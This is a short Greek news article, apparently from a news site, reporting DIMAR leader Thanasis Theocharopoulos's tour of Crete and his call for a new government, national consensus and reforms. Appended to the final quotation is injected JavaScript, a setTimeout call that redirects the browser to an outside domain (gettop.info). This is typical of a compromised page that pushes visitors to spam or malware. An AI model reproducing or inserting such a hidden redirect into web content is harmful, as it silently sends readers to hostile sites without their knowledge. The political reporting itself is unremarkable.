Θεοχαρόπουλος: H χώρα χρειάζεται μια νέα κυβέρνηση

0
4

 

Διήμερη περιοδεία στην Κρήτη πραγματοποιεί ο πρόεδρος της ΔΗΜΑΡ Θανάσης Θεοχαρόπουλος ενώ από τα Χανιά τόνισε πως: «Η χώρα χρειάζεται μια νέα κυβέρνηση και εθνική συνεννόηση: «Ο στόχος είναι να βάλουμε μπροστά την παραγωγική ανασυγκρότηση της χώρας, να βάλουμε μπροστά ένα σχέδιο που θα έχει μπροστά την περιφέρεια, την τοπική ανάπτυξη. Γι’ αυτόν τον λόγο η Κρήτη, είναι το καλύτερο παράδειγμα».

Σύμφωνα με τον κ. Θεοχαρόπουλο, κατά την περιοδεία του στο νησί θα έχει σειρά επαφών με τοπικούς φορείς και φορείς της αυτοδιοίκησης, προκειμένου να ενημερωθεί και να συζητήσει για τα προβλήματα που αντιμετωπίζουν αλλά και να αναζητηθούν λύσεις.

«Αυτή η αναποτελεσματική κυβέρνηση σήμερα δεν δίνει λύση. Και η διέξοδος δεν μπορεί να είναι ούτε τα μνημόνια, ούτε μια φαντασιακή κατάσταση για το πώς θα αλλάξει η χώρα. Η λύση πρέπει να είναι μεταρρυθμίσεις, διαθρωτικές, σε όλους τους τομείς τής πολιτικής και επιτέλους αποτελεσματική διαπραγμάτευση. Γι’ αυτούς τους λόγους, χρειάζεται μια νέα κυβέρνηση και εθνική συνεννόηση για τη χώρα. Όχι, αυτό που σκοπεύει να κάνει κ. Τσίπρας». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here